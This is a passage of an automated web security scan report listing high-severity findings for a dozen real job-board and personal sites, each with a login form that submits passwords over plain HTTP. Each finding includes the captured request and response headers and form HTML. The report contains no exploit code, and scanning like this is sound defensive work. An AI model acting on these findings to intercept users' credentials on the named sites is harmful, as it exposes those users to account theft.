Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.engineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.43. http://www.entrylevelcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.entrylevelcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.entrylevelcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.entrylevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.44. http://www.environmentalcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.environmentalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.environmentalcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.45. http://www.environmentalsafetyhealthcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.environmentalsafetyhealthcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.environmentalsafetyhealthcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.environmentalsafetyhealthcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.46. http://www.ericmmartin.com/projects/simplemodal/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ericmmartin.com
Path:	/projects/simplemodal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ericmmartin.com/wordpress/wp-login.php

The form contains the following password field:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:09:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34881

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

6.47. http://www.erpcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.erpcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.erpcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.erpcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.48. http://www.execcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.execcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.execcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.execcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.49. http://www.facilitiescrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facilitiescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facilitiescrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.facilitiescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.50. http://www.financialservicescrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.financialservicescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.financialservicescrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.financialservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.51. http://www.foodservicescrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foodservicescrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.foodservicescrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.foodservicescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.52. http://www.fundraisingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fundraisingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.fundraisingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.fundraisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.53. http://www.giscrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.giscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.giscrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.giscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.54. http://www.governmentcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.governmentcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.governmentcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
